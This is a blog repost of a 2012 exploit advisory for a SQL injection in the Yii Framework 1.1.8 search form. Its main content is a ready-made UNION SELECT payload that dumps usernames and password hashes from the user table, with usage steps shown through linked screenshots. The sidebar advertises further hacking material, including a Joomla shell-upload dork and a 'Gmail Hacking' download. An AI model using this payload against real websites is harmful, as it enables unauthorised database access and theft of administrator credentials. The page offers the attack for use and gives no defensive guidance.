• About
  • Policy
  • Contact

Phan Anh Buổi Sáng

  • Home
  • Kiến thức IT
    • PSD
    • Blogger
  • Translate
Google
Custom Search
Trang chủ » Exploit » SQL Injection » Yii Framework - Search SQL Injection Vulnerability

Yii Framework - Search SQL Injection Vulnerability

Unknown Labels: Exploit, SQL Injection Leave A Comment 07:08 
# Exploit Title: Yii Framework - Search SQL Injection Vulnerability
# Google Dork: No Dork
# Date: 20/11/2012
# Exploit Author: Juno_okyo
# Vendor Homepage: http://www.yiiframework.com/
# Software Link: http://www.yiiframework.com/download/
# Version: 1.1.8 (maybe another version)
#
##############################
################################################################
Vulnerability:
##############################################################################################

SQL Injection via search form. You can query to get some info about administrator account and something...

##############################################################################################
Exploitation:
##############################################################################################

' UNION SELECT 1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 fRom user-- -

##############################################################################################
Ex:
##############################################################################################

1. Put a query in search form with quotes: http://i.imgur.com/8OShy.png
2. It will display an error message: http://i.imgur.com/b8Tbo.png
3. Now, get some info with SQL Injection: http://i.imgur.com/qLjc0.png
4. Result: http://i.imgur.com/dgCRU.png

##############################################################################################
More Details:
##############################################################################################

Website: http://junookyo.blogspot.com/
About Exploit: http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html

##############################################################################################
Great thanks to Juno_okyo and James - J2TeaM
##############################################################################################

Published (21/11/2012):
[+] http://www.exploit-db.com/exploits/22877
[+] http://www.1337day.com/exploit/19778
[+] http://cxsecurity.com/issue/WLB-2012110151

Bài viết liên quan

← Bài đăng mới hơn Bài đăng cũ hơn → Trang chủ
Powered by Blogger.

Các Bình Luận Gần Đây

Bài đăng phổ biến

  • PSD - Người & Ta
    DOWNLOAD PSD
  • Fierce Domain Scan
    Written by RSnake with input from id , Vacuum and Robert E Lee . A special thanks to IceShaman to porting it to use multi-threading. Fierc...
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • Smart Hunter v.1.4.3 Public Version
      Download : http://adf.ly/FRrSF
  • Gmail Hacking by Raj Chandel
    Click To Download
  • Owasp Xelenium - XSS Scanner
    XSS scanner, Xelenium. It is a nice security testing tool that can be used to test and find security vulnerabilities in websites and web a...
  • Joomla Shell Upload Vulnerability
    requirements: 1.mind use this google dork to find vulnerable joomla sites ##  google dork : inurl:index.php?option=com_fabrik after open the...
  • Kỹ thuật Network Address Translation (NAT)
    Hầu hết những người sở hữu một kết nối Internet hiện đại ngày nay đều phải sử dụng đến kỹ thuật NAT (Network Address Translation) . NAT đã...
  • Doover Premium WordPress Theme 2
    DEMO: http://themeforest.net/item/doover-p...review/2279114 Download: http://www.mediafire.com/?04rc5n7qxl15hmo Pass Unlock: nothing Theme n...
  • Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Đôi lúc em tránh ánh mắt của anh. vì dường như lúc nào em cũng hiểu thấu lòng anh Demo Cover Download PSD loading...

Pageviews from the past week

Chuyên mục

Bài đăng phổ biến

  • PSD - Người & Ta
    PSD - Người & Ta
    DOWNLOAD PSD
  • Fierce Domain Scan
    Written by RSnake with input from id , Vacuum and Robert E Lee . A special thanks to IceShaman to porting it to use multi-threading. Fierc...
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • Smart Hunter v.1.4.3 Public Version
      Download : http://adf.ly/FRrSF
  • Gmail Hacking by Raj Chandel
    Gmail Hacking by Raj Chandel
    Click To Download
  • Owasp Xelenium - XSS Scanner
    XSS scanner, Xelenium. It is a nice security testing tool that can be used to test and find security vulnerabilities in websites and web a...
  • Joomla Shell Upload Vulnerability
    requirements: 1.mind use this google dork to find vulnerable joomla sites ##  google dork : inurl:index.php?option=com_fabrik after open the...
  • Kỹ thuật Network Address Translation (NAT)
    Hầu hết những người sở hữu một kết nối Internet hiện đại ngày nay đều phải sử dụng đến kỹ thuật NAT (Network Address Translation) . NAT đã...
  • Doover Premium WordPress Theme 2
    DEMO: http://themeforest.net/item/doover-p...review/2279114 Download: http://www.mediafire.com/?04rc5n7qxl15hmo Pass Unlock: nothing Theme n...
  • Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Đôi lúc em tránh ánh mắt của anh. vì dường như lúc nào em cũng hiểu thấu lòng anh Demo Cover Download PSD loading...
Google
Custom Search
Support: Facebook | Twitter | Google+ | Giới thiệu
Copyright © 2015 • Phan Anh Buổi Sáng • All Right Reserved. Template by Template Việt